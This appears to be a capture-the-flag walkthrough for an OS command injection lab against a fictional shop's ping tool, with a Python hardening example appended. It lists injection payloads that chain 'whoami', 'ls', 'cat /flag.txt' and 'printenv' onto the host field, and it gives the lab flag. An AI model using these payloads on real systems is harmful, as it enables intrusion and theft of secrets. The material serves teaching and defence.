HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Ping Tool — Crapazon

Command Injection · OS Command Injection
Difficulty: Intermediate
Vuln class: OS Command Injection
Steps: 4
// Objective
Exploit a network diagnostic tool that passes user input directly to a shell command to execute arbitrary OS commands.
// Tools required
Browser, Burp Suite
// Step-by-step walkthrough
1
Understand the target
Crapazon has a "Network Diagnostics" feature that lets sellers ping a host to check connectivity. It takes a hostname/IP as input and runs ping. The backend code is something like: system("ping -c 1 " + userInput)
2
Test for command injection
In Linux/Unix, you can chain commands using ; (semicolon), && (run if previous succeeds), or | (pipe output). Test by appending a second command.
Command / Input
127.0.0.1; whoami
Output
PING 127.0.0.1 (127.0.0.1): 56 data bytes ... root
The whoami output confirms command injection. The server executed both ping AND whoami.
3
Enumerate the server
Now explore. Find out where you are and what's on the filesystem.
Command / Input
127.0.0.1; pwd
127.0.0.1; ls -la
127.0.0.1; ls /var/www/html
4
Read the flag
Flags in command injection rooms are typically stored as environment variables or in a specific file on the filesystem.
Command / Input
127.0.0.1; cat /flag.txt
127.0.0.1; printenv | grep FLAG
Output
HackrGG{cm4nd_1nj3ct10n_p1ng_t00l}
Real-world command injection gives an attacker full server access: reading source code, environment variables (API keys, DB passwords), and potentially a reverse shell.
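As an added example, not part of the walkthrough or the Crapazon app (whose backend language is not given, so a Python backend is assumed): the string-concatenation pattern from step 1 next to a hardened version that validates the host and hands ping an argv list, so the ";"-chained inputs above are rejected instead of executed.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: letters, digits and hyphens only, no leading or
# trailing hyphen. Shell metacharacters (; & | $ ` and whitespace) cannot match.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_host(value: str) -> bool:
    """Accept a literal IPv4/IPv6 address or an RFC 1123 hostname, nothing else."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # "127.0.0.1", "::1" ...
        return True
    except ValueError:
        pass
    return all(_LABEL.match(label) for label in value.rstrip(".").split("."))


def vulnerable_ping_command(user_input: str) -> str:
    """The pattern the walkthrough describes: raw input concatenated into a shell string.
    Passing this to a shell (system(), shell=True) runs whatever follows a ';'."""
    return "ping -c 1 " + user_input


def safe_ping_argv(user_input: str) -> list:
    """Hardened form: allow-list the host, then build an argv list with no shell."""
    if not is_valid_host(user_input):
        raise ValueError("invalid host")
    return ["ping", "-c", "1", user_input]


def run_ping(user_input: str) -> subprocess.CompletedProcess:
    # shell=False (the default) passes argv straight to execve(); no shell ever
    # parses the input, so ';', '&&' and '|' are just bytes inside one argument.
    return subprocess.run(
        safe_ping_argv(user_input), capture_output=True, text=True, timeout=10
    )
```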
// Flag
Flag value
HackrGG{cm4nd_1nj3ct10n_p1ng_t00l}
Retrieved by injecting a cat command into the ping tool input.